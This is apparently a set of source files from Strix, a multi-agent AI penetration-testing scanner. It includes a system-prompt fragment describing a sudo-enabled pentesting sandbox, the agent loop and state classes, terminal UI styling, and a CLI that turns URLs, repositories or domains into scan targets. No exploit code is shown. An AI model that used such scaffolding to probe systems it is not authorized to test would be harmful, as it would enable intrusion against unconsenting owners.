- interactsh-client - OOB interaction testing
PROXY & INTERCEPTION:
- Caido CLI - Modern web proxy (already running). Used with proxy tool or with python tool (functions already imported).
- NOTE: If you are seeing proxy errors when sending requests, it usually means you are not sending requests to a correct url/host/port.
PROGRAMMING:
- Python 3, Poetry, Go, Node.js/npm
- Full development environment
- Docker is NOT available inside the sandbox. Do not run docker; rely on provided tools to run locally.
- You can install any additional tools/packages needed based on the task/context using package managers (apt, pip, npm, go install, etc.)
Directories:
- /workspace - Your private agent directory
- /shared_workspace - Shared between agents
- /home/pentester/tools - Additional tool scripts
- /home/pentester/tools/wordlists - Currently empty, but you should download wordlists here when you need.
Default user: pentester (sudo available)
</environment>
{% if loaded_module_names %}
<specialized_knowledge>
{# Dynamic prompt modules loaded based on agent specialization #}
{% for module_name in loaded_module_names %}
{{ get_module(module_name) }}
{% endfor %}
</specialized_knowledge>
{% endif %}

10
strix/agents/__init__.py Normal file
View File

@@ -0,0 +1,10 @@
from .base_agent import BaseAgent
from .state import AgentState
from .StrixAgent import StrixAgent
__all__ = [
"AgentState",
"BaseAgent",
"StrixAgent",
]

394
strix/agents/base_agent.py Normal file
View File

@@ -0,0 +1,394 @@
import asyncio
import logging
from pathlib import Path
from typing import TYPE_CHECKING, Any, Optional
if TYPE_CHECKING:
from strix.cli.tracer import Tracer
from jinja2 import (
Environment,
FileSystemLoader,
select_autoescape,
)
from strix.llm import LLM, LLMConfig
from strix.llm.utils import clean_content
from strix.tools import process_tool_invocations
from .state import AgentState
logger = logging.getLogger(__name__)
class AgentMeta(type):
agent_name: str
jinja_env: Environment
def __new__(cls, name: str, bases: tuple[type, ...], attrs: dict[str, Any]) -> type:
new_cls = super().__new__(cls, name, bases, attrs)
if name == "BaseAgent":
return new_cls
agents_dir = Path(__file__).parent
prompt_dir = agents_dir / name
new_cls.agent_name = name
new_cls.jinja_env = Environment(
loader=FileSystemLoader(prompt_dir),
autoescape=select_autoescape(enabled_extensions=(), default_for_string=False),
)
return new_cls
class BaseAgent(metaclass=AgentMeta):
max_iterations = 200
agent_name: str = ""
jinja_env: Environment
default_llm_config: LLMConfig | None = None
def __init__(self, config: dict[str, Any]):
self.config = config
self.local_source_path = config.get("local_source_path")
if "max_iterations" in config:
self.max_iterations = config["max_iterations"]
self.llm_config_name = config.get("llm_config_name", "default")
self.llm_config = config.get("llm_config", self.default_llm_config)
if self.llm_config is None:
raise ValueError("llm_config is required but not provided")
self.llm = LLM(self.llm_config, agent_name=self.agent_name)
state_from_config = config.get("state")
if state_from_config is not None:
self.state = state_from_config
else:
self.state = AgentState(
agent_name=self.agent_name,
max_iterations=self.max_iterations,
)
self._current_task: asyncio.Task[Any] | None = None
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
if tracer:
tracer.log_agent_creation(
agent_id=self.state.agent_id,
name=self.state.agent_name,
task=self.state.task,
parent_id=self.state.parent_id,
)
if self.state.parent_id is None:
scan_config = tracer.scan_config or {}
exec_id = tracer.log_tool_execution_start(
agent_id=self.state.agent_id,
tool_name="scan_start_info",
args=scan_config,
)
tracer.update_tool_execution(execution_id=exec_id, status="completed", result={})
else:
exec_id = tracer.log_tool_execution_start(
agent_id=self.state.agent_id,
tool_name="subagent_start_info",
args={
"name": self.state.agent_name,
"task": self.state.task,
"parent_id": self.state.parent_id,
},
)
tracer.update_tool_execution(execution_id=exec_id, status="completed", result={})
self._add_to_agents_graph()
def _add_to_agents_graph(self) -> None:
from strix.tools.agents_graph import agents_graph_actions
node = {
"id": self.state.agent_id,
"name": self.state.agent_name,
"task": self.state.task,
"status": "running",
"parent_id": self.state.parent_id,
"created_at": self.state.start_time,
"finished_at": None,
"result": None,
"llm_config": self.llm_config_name,
"agent_type": self.__class__.__name__,
"state": self.state.model_dump(),
}
agents_graph_actions._agent_graph["nodes"][self.state.agent_id] = node
agents_graph_actions._agent_instances[self.state.agent_id] = self
agents_graph_actions._agent_states[self.state.agent_id] = self.state
if self.state.parent_id:
agents_graph_actions._agent_graph["edges"].append(
{"from": self.state.parent_id, "to": self.state.agent_id, "type": "delegation"}
)
if self.state.agent_id not in agents_graph_actions._agent_messages:
agents_graph_actions._agent_messages[self.state.agent_id] = []
if self.state.parent_id is None and agents_graph_actions._root_agent_id is None:
agents_graph_actions._root_agent_id = self.state.agent_id
def cancel_current_execution(self) -> None:
if self._current_task and not self._current_task.done():
self._current_task.cancel()
self._current_task = None
async def agent_loop(self, task: str) -> dict[str, Any]:
await self._initialize_sandbox_and_state(task)
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
while True:
self._check_agent_messages(self.state)
if self.state.is_waiting_for_input():
await self._wait_for_input()
continue
if self.state.should_stop():
await self._enter_waiting_state(tracer)
continue
self.state.increment_iteration()
try:
should_finish = await self._process_iteration(tracer)
if should_finish:
await self._enter_waiting_state(tracer, task_completed=True)
continue
except asyncio.CancelledError:
await self._enter_waiting_state(tracer, error_occurred=False, was_cancelled=True)
continue
except (RuntimeError, ValueError, TypeError) as e:
if not await self._handle_iteration_error(e, tracer):
await self._enter_waiting_state(tracer, error_occurred=True)
continue
async def _wait_for_input(self) -> None:
import asyncio
await asyncio.sleep(0.5)
async def _enter_waiting_state(
self,
tracer: Optional["Tracer"],
task_completed: bool = False,
error_occurred: bool = False,
was_cancelled: bool = False,
) -> None:
self.state.enter_waiting_state()
if tracer:
if task_completed:
tracer.update_agent_status(self.state.agent_id, "completed")
elif error_occurred:
tracer.update_agent_status(self.state.agent_id, "error")
elif was_cancelled:
tracer.update_agent_status(self.state.agent_id, "stopped")
else:
tracer.update_agent_status(self.state.agent_id, "stopped")
if task_completed:
self.state.add_message(
"assistant",
"Task completed. I'm now waiting for follow-up instructions or new tasks.",
)
elif error_occurred:
self.state.add_message(
"assistant", "An error occurred. I'm now waiting for new instructions."
)
elif was_cancelled:
self.state.add_message(
"assistant", "Execution was cancelled. I'm now waiting for new instructions."
)
else:
self.state.add_message(
"assistant",
"Execution paused. I'm now waiting for new instructions or any updates.",
)
async def _initialize_sandbox_and_state(self, task: str) -> None:
import os
sandbox_mode = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
if not sandbox_mode and self.state.sandbox_id is None:
from strix.runtime import get_runtime
runtime = get_runtime()
sandbox_info = await runtime.create_sandbox(
self.state.agent_id, self.state.sandbox_token, self.local_source_path
)
self.state.sandbox_id = sandbox_info["workspace_id"]
self.state.sandbox_token = sandbox_info["auth_token"]
self.state.sandbox_info = sandbox_info
if not self.state.task:
self.state.task = task
self.state.add_message("user", task)
async def _process_iteration(self, tracer: Optional["Tracer"]) -> bool:
response = await self.llm.generate(self.state.get_conversation_history())
content_stripped = (response.content or "").strip()
if not content_stripped:
corrective_message = (
"You MUST NOT respond with empty messages. "
"If you currently have nothing to do or say, use an appropriate tool instead:\n"
"- Use agents_graph_actions.wait_for_message to wait for messages "
"from user or other agents\n"
"- Use agents_graph_actions.agent_finish if you are a sub-agent "
"and your task is complete\n"
"- Use finish_actions.finish_scan if you are the root/main agent "
"and the scan is complete"
)
self.state.add_message("user", corrective_message)
return False
self.state.add_message("assistant", response.content)
if tracer:
tracer.log_chat_message(
content=clean_content(response.content),
role="assistant",
agent_id=self.state.agent_id,
)
actions = (
response.tool_invocations
if hasattr(response, "tool_invocations") and response.tool_invocations
else []
)
if actions:
return await self._execute_actions(actions, tracer)
return False
async def _execute_actions(self, actions: list[Any], tracer: Optional["Tracer"]) -> bool:
"""Execute actions and return True if agent should finish."""
for action in actions:
self.state.add_action(action)
conversation_history = self.state.get_conversation_history()
tool_task = asyncio.create_task(
process_tool_invocations(actions, conversation_history, self.state)
)
self._current_task = tool_task
try:
should_agent_finish = await tool_task
self._current_task = None
except asyncio.CancelledError:
self._current_task = None
self.state.add_error("Tool execution cancelled by user")
raise
self.state.messages = conversation_history
if should_agent_finish:
self.state.set_completed({"success": True})
if tracer:
tracer.update_agent_status(self.state.agent_id, "completed")
return True
return False
async def _handle_iteration_error(
self,
error: RuntimeError | ValueError | TypeError | asyncio.CancelledError,
tracer: Optional["Tracer"],
) -> bool:
error_msg = f"Error in iteration {self.state.iteration}: {error!s}"
logger.exception(error_msg)
self.state.add_error(error_msg)
if tracer:
tracer.update_agent_status(self.state.agent_id, "error")
return True
def _check_agent_messages(self, state: AgentState) -> None:
try:
from strix.tools.agents_graph.agents_graph_actions import _agent_graph, _agent_messages
agent_id = state.agent_id
if not agent_id or agent_id not in _agent_messages:
return
messages = _agent_messages[agent_id]
if messages:
has_new_messages = False
for message in messages:
if not message.get("read", False):
if state.is_waiting_for_input():
state.resume_from_waiting()
has_new_messages = True
sender_name = "Unknown Agent"
sender_id = message.get("from")
if sender_id == "user":
sender_name = "User"
state.add_message("user", message.get("content", ""))
else:
if sender_id and sender_id in _agent_graph.get("nodes", {}):
sender_name = _agent_graph["nodes"][sender_id]["name"]
message_content = f"""<inter_agent_message>
<delivery_notice>
<important>You have received a message from another agent. You should acknowledge
this message and respond appropriately based on its content. However, DO NOT echo
back or repeat the entire message structure in your response. Simply process the
content and respond naturally as/if needed.</important>
</delivery_notice>
<sender>
<agent_name>{sender_name}</agent_name>
<agent_id>{sender_id}</agent_id>
</sender>
<message_metadata>
<type>{message.get("message_type", "information")}</type>
<priority>{message.get("priority", "normal")}</priority>
<timestamp>{message.get("timestamp", "")}</timestamp>
</message_metadata>
<content>
{message.get("content", "")}
</content>
<delivery_info>
<note>This message was delivered during your task execution.
Please acknowledge and respond if needed.</note>
</delivery_info>
</inter_agent_message>"""
state.add_message("user", message_content.strip())
message["read"] = True
if has_new_messages and not state.is_waiting_for_input():
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
if tracer:
tracer.update_agent_status(agent_id, "running")
except (AttributeError, KeyError, TypeError) as e:
import logging
logger = logging.getLogger(__name__)
logger.warning(f"Error checking agent messages: {e}")
return

139
strix/agents/state.py Normal file
View File

@@ -0,0 +1,139 @@
import uuid
from datetime import UTC, datetime
from typing import Any
from pydantic import BaseModel, Field
def _generate_agent_id() -> str:
return f"agent_{uuid.uuid4().hex[:8]}"
class AgentState(BaseModel):
agent_id: str = Field(default_factory=_generate_agent_id)
agent_name: str = "Strix Agent"
parent_id: str | None = None
sandbox_id: str | None = None
sandbox_token: str | None = None
sandbox_info: dict[str, Any] | None = None
task: str = ""
iteration: int = 0
max_iterations: int = 200
completed: bool = False
stop_requested: bool = False
waiting_for_input: bool = False
final_result: dict[str, Any] | None = None
messages: list[dict[str, Any]] = Field(default_factory=list)
context: dict[str, Any] = Field(default_factory=dict)
start_time: str = Field(default_factory=lambda: datetime.now(UTC).isoformat())
last_updated: str = Field(default_factory=lambda: datetime.now(UTC).isoformat())
actions_taken: list[dict[str, Any]] = Field(default_factory=list)
observations: list[dict[str, Any]] = Field(default_factory=list)
errors: list[str] = Field(default_factory=list)
def increment_iteration(self) -> None:
self.iteration += 1
self.last_updated = datetime.now(UTC).isoformat()
def add_message(self, role: str, content: Any) -> None:
self.messages.append({"role": role, "content": content})
self.last_updated = datetime.now(UTC).isoformat()
def add_action(self, action: dict[str, Any]) -> None:
self.actions_taken.append(
{
"iteration": self.iteration,
"timestamp": datetime.now(UTC).isoformat(),
"action": action,
}
)
def add_observation(self, observation: dict[str, Any]) -> None:
self.observations.append(
{
"iteration": self.iteration,
"timestamp": datetime.now(UTC).isoformat(),
"observation": observation,
}
)
def add_error(self, error: str) -> None:
self.errors.append(f"Iteration {self.iteration}: {error}")
self.last_updated = datetime.now(UTC).isoformat()
def update_context(self, key: str, value: Any) -> None:
self.context[key] = value
self.last_updated = datetime.now(UTC).isoformat()
def set_completed(self, final_result: dict[str, Any] | None = None) -> None:
self.completed = True
self.final_result = final_result
self.last_updated = datetime.now(UTC).isoformat()
def request_stop(self) -> None:
self.stop_requested = True
self.last_updated = datetime.now(UTC).isoformat()
def should_stop(self) -> bool:
return self.stop_requested or self.completed or self.has_reached_max_iterations()
def is_waiting_for_input(self) -> bool:
return self.waiting_for_input
def enter_waiting_state(self) -> None:
self.waiting_for_input = True
self.stop_requested = False
self.last_updated = datetime.now(UTC).isoformat()
def resume_from_waiting(self, new_task: str | None = None) -> None:
self.waiting_for_input = False
self.stop_requested = False
self.completed = False
if new_task:
self.task = new_task
self.last_updated = datetime.now(UTC).isoformat()
def has_reached_max_iterations(self) -> bool:
return self.iteration >= self.max_iterations
def has_empty_last_messages(self, count: int = 3) -> bool:
if len(self.messages) < count:
return False
last_messages = self.messages[-count:]
for message in last_messages:
content = message.get("content", "")
if isinstance(content, str) and content.strip():
return False
return True
def get_conversation_history(self) -> list[dict[str, Any]]:
return self.messages
def get_execution_summary(self) -> dict[str, Any]:
return {
"agent_id": self.agent_id,
"agent_name": self.agent_name,
"parent_id": self.parent_id,
"sandbox_id": self.sandbox_id,
"sandbox_info": self.sandbox_info,
"task": self.task,
"iteration": self.iteration,
"max_iterations": self.max_iterations,
"completed": self.completed,
"final_result": self.final_result,
"start_time": self.start_time,
"last_updated": self.last_updated,
"total_actions": len(self.actions_taken),
"total_observations": len(self.observations),
"total_errors": len(self.errors),
"has_errors": len(self.errors) > 0,
"max_iterations_reached": self.has_reached_max_iterations() and not self.completed,
}

4
strix/cli/__init__.py Normal file
View File

@@ -0,0 +1,4 @@
from .main import main
__all__ = ["main"]

1122
strix/cli/app.py Normal file

File diff suppressed because it is too large Load Diff

680
strix/cli/assets/cli.tcss Normal file
View File

@@ -0,0 +1,680 @@
Screen {
background: #1a1a1a;
color: #d4d4d4;
}
#splash_screen {
height: 100%;
width: 100%;
background: #1a1a1a;
color: #22c55e;
content-align: center middle;
text-align: center;
}
#splash_content {
width: auto;
height: auto;
background: transparent;
text-align: center;
padding: 2;
}
#main_container {
height: 100%;
padding: 0;
margin: 0;
background: #1a1a1a;
}
#content_container {
height: 1fr;
padding: 0;
background: transparent;
}
#agents_tree {
width: 20%;
background: transparent;
border: round #262626;
border-title-color: #a8a29e;
border-title-style: bold;
margin-left: 1;
padding: 1;
}
#chat_area_container {
width: 80%;
background: transparent;
}
#chat_history {
height: 1fr;
background: transparent;
border: round #1a1a1a;
padding: 0;
margin-bottom: 0;
margin-right: 0;
scrollbar-background: #0f0f0f;
scrollbar-color: #262626;
scrollbar-corner-color: #0f0f0f;
scrollbar-size: 1 1;
}
#agent_status_display {
height: 1;
background: transparent;
margin: 0;
padding: 0 1;
}
#agent_status_display.hidden {
display: none;
}
#status_text {
width: 1fr;
height: 100%;
background: transparent;
color: #a3a3a3;
text-align: left;
content-align: left middle;
text-style: italic;
margin: 0;
padding: 0;
}
#keymap_indicator {
width: auto;
height: 100%;
background: transparent;
color: #737373;
text-align: right;
content-align: right middle;
text-style: none;
margin: 0;
padding: 0;
}
#chat_input_container {
height: 3;
background: transparent;
border: round #525252;
margin-right: 0;
padding: 0;
layout: horizontal;
align-vertical: middle;
}
#chat_input_container:focus-within {
border: round #22c55e;
}
#chat_input_container:focus-within #chat_prompt {
color: #22c55e;
text-style: bold;
}
#chat_prompt {
width: auto;
height: 100%;
padding: 0 0 0 1;
color: #737373;
content-align-vertical: middle;
}
#chat_history:focus {
border: round #22c55e;
}
#chat_input {
width: 1fr;
height: 100%;
background: #121212;
border: none;
color: #d4d4d4;
padding: 0;
margin: 0;
}
#chat_input:focus {
border: none;
}
#chat_input > .text-area--placeholder {
color: #525252;
text-style: italic;
}
#chat_input > .text-area--cursor {
color: #22c55e;
background: #22c55e;
}
.chat-placeholder {
width: 100%;
height: 100%;
content-align: center middle;
text-align: center;
color: #737373;
text-style: italic;
}
.chat-content {
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
padding: 0 1;
background: transparent;
width: 100%;
}
.chat-message {
margin-bottom: 0;
padding: 0;
background: transparent;
width: 100%;
}
.user-message {
color: #e5e5e5;
border-left: thick #3b82f6;
padding-left: 1;
margin-bottom: 1;
}
.tool-call {
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
padding: 0 1;
background: #0a0a0a;
border: round #1a1a1a;
border-left: thick #f59e0b;
width: 100%;
}
.tool-call.status-completed {
border-left: thick #22c55e;
background: #0d1f12;
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.tool-call.status-running {
border-left: thick #f59e0b;
background: #1f1611;
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.tool-call.status-failed,
.tool-call.status-error {
border-left: thick #ef4444;
background: #1f0d0d;
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.browser-tool,
.terminal-tool,
.python-tool,
.agents-graph-tool,
.file-edit-tool,
.proxy-tool,
.notes-tool,
.thinking-tool,
.web-search-tool,
.finish-tool,
.reporting-tool,
.scan-info-tool,
.subagent-info-tool {
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.browser-tool {
border-left: thick #06b6d4;
}
.browser-tool.status-completed {
border-left: thick #06b6d4;
background: transparent;
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.browser-tool.status-running {
border-left: thick #0891b2;
background: transparent;
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.terminal-tool {
border-left: thick #22c55e;
}
.terminal-tool.status-completed {
border-left: thick #22c55e;
background: transparent;
}
.terminal-tool.status-running {
border-left: thick #16a34a;
background: transparent;
}
.python-tool {
border-left: thick #3b82f6;
}
.python-tool.status-completed {
border-left: thick #3b82f6;
background: transparent;
}
.python-tool.status-running {
border-left: thick #2563eb;
background: transparent;
}
.agents-graph-tool {
border-left: thick #fbbf24;
}
.agents-graph-tool.status-completed {
border-left: thick #fbbf24;
background: transparent;
}
.agents-graph-tool.status-running {
border-left: thick #f59e0b;
background: transparent;
}
.file-edit-tool {
border-left: thick #10b981;
}
.file-edit-tool.status-completed {
border-left: thick #10b981;
background: transparent;
}
.file-edit-tool.status-running {
border-left: thick #059669;
background: transparent;
}
.proxy-tool {
border-left: thick #06b6d4;
}
.proxy-tool.status-completed {
border-left: thick #06b6d4;
background: transparent;
}
.proxy-tool.status-running {
border-left: thick #0891b2;
background: transparent;
}
.notes-tool {
border-left: thick #fbbf24;
}
.notes-tool.status-completed {
border-left: thick #fbbf24;
background: transparent;
}
.notes-tool.status-running {
border-left: thick #f59e0b;
background: transparent;
}
.thinking-tool {
border-left: thick #a855f7;
}
.thinking-tool.status-completed {
border-left: thick #a855f7;
background: transparent;
}
.thinking-tool.status-running {
border-left: thick #9333ea;
background: transparent;
}
.web-search-tool {
border-left: thick #22c55e;
}
.web-search-tool.status-completed {
border-left: thick #22c55e;
background: transparent;
}
.web-search-tool.status-running {
border-left: thick #16a34a;
background: transparent;
}
.finish-tool {
border-left: thick #dc2626;
}
.finish-tool.status-completed {
border-left: thick #dc2626;
background: transparent;
}
.finish-tool.status-running {
border-left: thick #b91c1c;
background: transparent;
}
.reporting-tool {
border-left: thick #ea580c;
}
.reporting-tool.status-completed {
border-left: thick #ea580c;
background: transparent;
}
.reporting-tool.status-running {
border-left: thick #c2410c;
background: transparent;
}
.scan-info-tool {
border-left: thick #22c55e;
background: transparent;
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.scan-info-tool.status-completed {
border-left: thick #22c55e;
background: transparent;
}
.scan-info-tool.status-running {
border-left: thick #16a34a;
background: transparent;
}
.subagent-info-tool {
border-left: thick #22c55e;
background: transparent;
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.subagent-info-tool.status-completed {
border-left: thick #22c55e;
background: transparent;
}
.subagent-info-tool.status-running {
border-left: thick #16a34a;
background: transparent;
}
Tree {
background: transparent;
color: #e7e5e4;
scrollbar-background: transparent;
scrollbar-color: #404040;
scrollbar-corner-color: transparent;
scrollbar-size: 1 1;
}
Tree > .tree--label {
text-style: bold;
color: #a8a29e;
background: transparent;
padding: 0 1;
margin-bottom: 1;
border-bottom: solid #262626;
text-align: center;
}
.tree--node {
height: 1;
padding: 0;
margin: 0;
}
.tree--node-label {
color: #d6d3d1;
background: transparent;
text-style: none;
padding: 0 1;
margin: 0 1;
}
.tree--node:hover .tree--node-label {
background: transparent;
color: #fafaf9;
text-style: bold;
border-left: solid #a8a29e;
}
.tree--node.-selected .tree--node-label {
background: transparent;
color: #fafaf9;
text-style: bold;
border-left: heavy #d6d3d1;
}
.tree--node.-expanded .tree--node-label {
text-style: bold;
color: #fafaf9;
background: transparent;
border-left: solid #78716c;
}
Tree:focus {
border: round #262626;
}
Tree:focus > .tree--label {
color: #fafaf9;
text-style: bold;
background: transparent;
}
.tree--node .tree--node .tree--node-label {
color: #a8a29e;
padding-left: 2;
border: none;
background: transparent;
margin-left: 1;
}
.tree--node .tree--node:hover .tree--node-label {
background: transparent;
color: #e7e5e4;
}
.tree--node .tree--node .tree--node .tree--node-label {
color: #78716c;
padding-left: 3;
text-style: none;
border: none;
background: transparent;
margin-left: 2;
}
StopAgentScreen {
align: center middle;
background: $background 0%;
}
#stop_agent_dialog {
grid-size: 1;
grid-gutter: 1;
grid-rows: auto auto;
padding: 1;
width: 30;
height: auto;
border: round #a3a3a3;
background: #1a1a1a 98%;
}
#stop_agent_title {
color: #a3a3a3;
text-style: bold;
text-align: center;
width: 100%;
margin-bottom: 0;
}
#stop_agent_buttons {
grid-size: 2;
grid-gutter: 1;
grid-columns: 1fr 1fr;
width: 100%;
height: 1;
}
#stop_agent_buttons Button {
height: 1;
min-height: 1;
border: none;
text-style: bold;
}
#stop_agent {
background: transparent;
color: #ef4444;
border: none;
}
#stop_agent:hover, #stop_agent:focus {
background: #ef4444;
color: #ffffff;
border: none;
}
#cancel_stop {
background: transparent;
color: #737373;
border: none;
}
#cancel_stop:hover, #cancel_stop:focus {
background:rgb(54, 54, 54);
color: #ffffff;
border: none;
}
QuitScreen {
align: center middle;
background: $background 0%;
}
#quit_dialog {
grid-size: 1;
grid-gutter: 1;
grid-rows: auto auto;
padding: 1;
width: 24;
height: auto;
border: round #525252;
background: #1a1a1a 98%;
}
#quit_title {
color: #d4d4d4;
text-style: bold;
text-align: center;
width: 100%;
margin-bottom: 0;
}
#quit_buttons {
grid-size: 2;
grid-gutter: 1;
grid-columns: 1fr 1fr;
width: 100%;
height: 1;
}
#quit_buttons Button {
height: 1;
min-height: 1;
border: none;
text-style: bold;
}
#quit {
background: transparent;
color: #ef4444;
border: none;
}
#quit:hover, #quit:focus {
background: #ef4444;
color: #ffffff;
border: none;
}
#cancel {
background: transparent;
color: #737373;
border: none;
}
#cancel:hover, #cancel:focus {
background:rgb(54, 54, 54);
color: #ffffff;
border: none;
}
HelpScreen {
align: center middle;
background: $background 0%;
}
#dialog {
grid-size: 1;
grid-gutter: 0 1;
grid-rows: auto auto;
padding: 1 2;
width: 40;
height: auto;
border: round #22c55e;
background: #1a1a1a 98%;
}
#help_title {
color: #22c55e;
text-style: bold;
text-align: center;
width: 100%;
margin-bottom: 1;
}
#help_content {
color: #d4d4d4;
text-align: left;
width: 100%;
margin-bottom: 1;
padding: 0;
background: transparent;
text-style: none;
}

542
strix/cli/main.py Normal file
View File

@@ -0,0 +1,542 @@
#!/usr/bin/env python3
"""
Strix Agent Command Line Interface
"""
import argparse
import asyncio
import logging
import os
import secrets
import sys
from pathlib import Path
from typing import Any
from urllib.parse import urlparse
import docker
import litellm
from docker.errors import DockerException
from rich.console import Console
from rich.panel import Panel
from rich.text import Text
from strix.cli.app import run_strix_cli
from strix.cli.tracer import get_global_tracer
from strix.runtime.docker_runtime import STRIX_IMAGE
logging.getLogger().setLevel(logging.ERROR)
def format_token_count(count: float) -> str:
count = int(count)
if count >= 1_000_000:
return f"{count / 1_000_000:.1f}M"
if count >= 1_000:
return f"{count / 1_000:.1f}K"
return str(count)
def validate_environment() -> None:
console = Console()
missing_required_vars = []
missing_optional_vars = []
if not os.getenv("STRIX_LLM"):
missing_required_vars.append("STRIX_LLM")
if not os.getenv("LLM_API_KEY"):
missing_required_vars.append("LLM_API_KEY")
if not os.getenv("PERPLEXITY_API_KEY"):
missing_optional_vars.append("PERPLEXITY_API_KEY")
if missing_required_vars:
error_text = Text()
error_text.append("", style="bold red")
error_text.append("MISSING REQUIRED ENVIRONMENT VARIABLES", style="bold red")
error_text.append("\n\n", style="white")
for var in missing_required_vars:
error_text.append(f"{var}", style="bold yellow")
error_text.append(" is not set\n", style="white")
if missing_optional_vars:
error_text.append(
"\nOptional (but recommended) environment variables:\n", style="dim white"
)
for var in missing_optional_vars:
error_text.append(f"{var}", style="dim yellow")
error_text.append(" is not set\n", style="dim white")
error_text.append("\nRequired environment variables:\n", style="white")
error_text.append("", style="white")
error_text.append("STRIX_LLM", style="bold cyan")
error_text.append(
" - Model name to use with litellm (e.g., 'anthropic/claude-sonnet-4-20250514')\n",
style="white",
)
error_text.append("", style="white")
error_text.append("LLM_API_KEY", style="bold cyan")
error_text.append(" - API key for the LLM provider\n", style="white")
if missing_optional_vars:
error_text.append("\nOptional environment variables:\n", style="white")
error_text.append("", style="white")
error_text.append("PERPLEXITY_API_KEY", style="bold cyan")
error_text.append(
" - API key for Perplexity AI web search (enables real-time research)\n",
style="white",
)
error_text.append("\nExample setup:\n", style="white")
error_text.append(
"export STRIX_LLM='anthropic/claude-sonnet-4-20250514'\n", style="dim white"
)
error_text.append("export LLM_API_KEY='your-api-key-here'\n", style="dim white")
if missing_optional_vars:
error_text.append(
"export PERPLEXITY_API_KEY='your-perplexity-key-here'", style="dim white"
)
panel = Panel(
error_text,
title="[bold red]🛡️ STRIX CONFIGURATION ERROR",
title_align="center",
border_style="red",
padding=(1, 2),
)
console.print("\n")
console.print(panel)
console.print()
sys.exit(1)
def _validate_llm_response(response: Any) -> None:
if not response or not response.choices or not response.choices[0].message.content:
raise RuntimeError("Invalid response from LLM")
async def warm_up_llm() -> None:
console = Console()
try:
model_name = os.getenv("STRIX_LLM", "anthropic/claude-sonnet-4-20250514")
api_key = os.getenv("LLM_API_KEY")
if api_key:
litellm.api_key = api_key
test_messages = [
{"role": "system", "content": "You are a helpful assistant."},
{"role": "user", "content": "Reply with just 'OK'."},
]
response = litellm.completion(
model=model_name,
messages=test_messages,
max_tokens=10,
)
_validate_llm_response(response)
except Exception as e: # noqa: BLE001
error_text = Text()
error_text.append("", style="bold red")
error_text.append("LLM CONNECTION FAILED", style="bold red")
error_text.append("\n\n", style="white")
error_text.append("Could not establish connection to the language model.\n", style="white")
error_text.append("Please check your configuration and try again.\n", style="white")
error_text.append(f"\nError: {e}", style="dim white")
panel = Panel(
error_text,
title="[bold red]🛡️ STRIX STARTUP ERROR",
title_align="center",
border_style="red",
padding=(1, 2),
)
console.print("\n")
console.print(panel)
console.print()
sys.exit(1)
def generate_run_name() -> str:
# fmt: off
adjectives = [
"stealthy", "sneaky", "crafty", "elite", "phantom", "shadow", "silent",
"rogue", "covert", "ninja", "ghost", "cyber", "digital", "binary",
"encrypted", "obfuscated", "masked", "cloaked", "invisible", "anonymous"
]
nouns = [
"exploit", "payload", "backdoor", "rootkit", "keylogger", "botnet", "trojan",
"worm", "virus", "packet", "buffer", "shell", "daemon", "spider", "crawler",
"scanner", "sniffer", "honeypot", "firewall", "breach"
]
# fmt: on
adj = secrets.choice(adjectives)
noun = secrets.choice(nouns)
number = secrets.randbelow(900) + 100
return f"{adj}-{noun}-{number}"
def infer_target_type(target: str) -> tuple[str, dict[str, str]]:
if not target or not isinstance(target, str):
raise ValueError("Target must be a non-empty string")
target = target.strip()
parsed = urlparse(target)
if parsed.scheme in ("http", "https"):
if any(
host in parsed.netloc.lower() for host in ["github.com", "gitlab.com", "bitbucket.org"]
):
return "repository", {"target_repo": target}
return "web_application", {"target_url": target}
path = Path(target)
try:
if path.exists():
if path.is_dir():
return "local_code", {"target_path": str(path.absolute())}
raise ValueError(f"Path exists but is not a directory: {target}")
except (OSError, RuntimeError) as e:
raise ValueError(f"Invalid path: {target} - {e!s}") from e
if target.startswith("git@") or target.endswith(".git"):
return "repository", {"target_repo": target}
if "." in target and "/" not in target and not target.startswith("."):
parts = target.split(".")
if len(parts) >= 2 and all(p and p.strip() for p in parts):
return "web_application", {"target_url": f"https://{target}"}
raise ValueError(
f"Invalid target: {target}\n"
"Target must be one of:\n"
"- A valid URL (http:// or https://)\n"
"- A Git repository URL (https://github.com/... or git@github.com:...)\n"
"- A local directory path\n"
"- A domain name (e.g., example.com)"
)
def parse_arguments() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description="Strix Multi-Agent Cybersecurity Scanner",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Web application scan
strix --target https://example.com
# GitHub repository analysis
strix --target https://github.com/user/repo
strix --target git@github.com:user/repo.git
# Local code analysis
strix --target ./my-project
# Domain scan
strix --target example.com
# Custom instructions
strix --target example.com --instruction "Focus on authentication vulnerabilities"
""",
)
parser.add_argument(
"--target",
type=str,
required=True,
help="Target to scan (URL, repository, local directory path, or domain name)",
)
parser.add_argument(
"--instruction",
type=str,
help="Custom instructions for the scan. This can be "
"specific vulnerability types to focus on (e.g., 'Focus on IDOR and XSS'), "
"testing approaches (e.g., 'Perform thorough authentication testing'), "
"test credentials (e.g., 'Use the following credentials to access the app: "
"admin:password123'), "
"or areas of interest (e.g., 'Check login API endpoint for security issues')",
)
parser.add_argument(
"--run-name",
type=str,
help="Custom name for this scan run",
)
args = parser.parse_args()
try:
args.target_type, args.target_dict = infer_target_type(args.target)
except ValueError as e:
parser.error(str(e))
return args
def _build_stats_text(tracer: Any) -> Text:
stats_text = Text()
if not tracer:
return stats_text
vuln_count = len(tracer.vulnerability_reports)
tool_count = tracer.get_real_tool_count()
agent_count = len(tracer.agents)
if vuln_count > 0:
stats_text.append("🔍 Vulnerabilities Found: ", style="bold red")
